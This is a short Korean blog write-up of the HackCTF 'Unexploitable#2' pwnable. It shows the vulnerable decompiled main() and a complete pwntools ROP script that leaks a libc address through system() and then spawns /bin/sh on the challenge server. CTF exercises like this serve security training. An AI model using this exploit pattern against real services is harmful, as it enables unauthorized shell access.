Hackctf Unexploitable#2 Writeup

LeeDoHyun · April 8, 2020

문제를 풀려고 보니, puts, write, read가 없어서 평소에 릭하던대로 하지못했습니다.

삽질도중에 system함수로 메모리릭이 가능하다는것을 알았습니다.

int __cdecl main(int argc, const char **argv, const char **envp)
{
  char s; // [rsp+0h] [rbp-10h]

  setvbuf(_bss_start, 0LL, 2, 0LL);
  setvbuf(stdin, 0LL, 2, 0LL);
  fwrite("Hard RTL ha? You don't even have [email protected]!\n", 1uLL, 0x30uLL, _bss_start);
  fgets(&s, 64, stdin);
  return 0;
}

system함수로 fgets를 릭해준뒤 pop rdi 가젯으로 system함수를 써주면 됩니다.

ex.py

from pwn import *

#context.log_level = "debug"
IP = "ctf.j0n9hyun.xyz"
PORT = "3029"
r = remote(IP, PORT)
#r = process("./Unexploitable_2")
e = ELF("./Unexploitable_2")
libc = e.libc

pr = 0x400773
fgets_got = e.got["fgets"]
system_plt = e.plt["system"]
main = e.symbols["main"]

r.recvuntil("Hard RTL ha? You don't even have [email protected]!")
payload = "A"*(0x10 + 0x8)
payload += p64(pr)
payload += p64(fgets_got)
payload += p64(system_plt)
payload += p64(main)
r.sendline(payload)

fwrite_leak = u64(r.recvuntil("\x7f")[-6:] + "\x00\x00")
base = fwrite_leak - libc.symbols["fgets"]
binsh = base + libc.search("/bin/sh").next()

info("fwrite leak = " + hex(fwrite_leak))
info("base addr = " + hex(base))
info("binsh addr = " + hex(binsh))

r.recvuntil("Hard RTL ha? You don't even have [email protected]!")
payload = "A"*(0x10 + 0x8)
payload += p64(pr)
payload += p64(binsh)
payload += p64(system_plt)
r.sendline(payload)
r.interactive()

Twitter, Facebook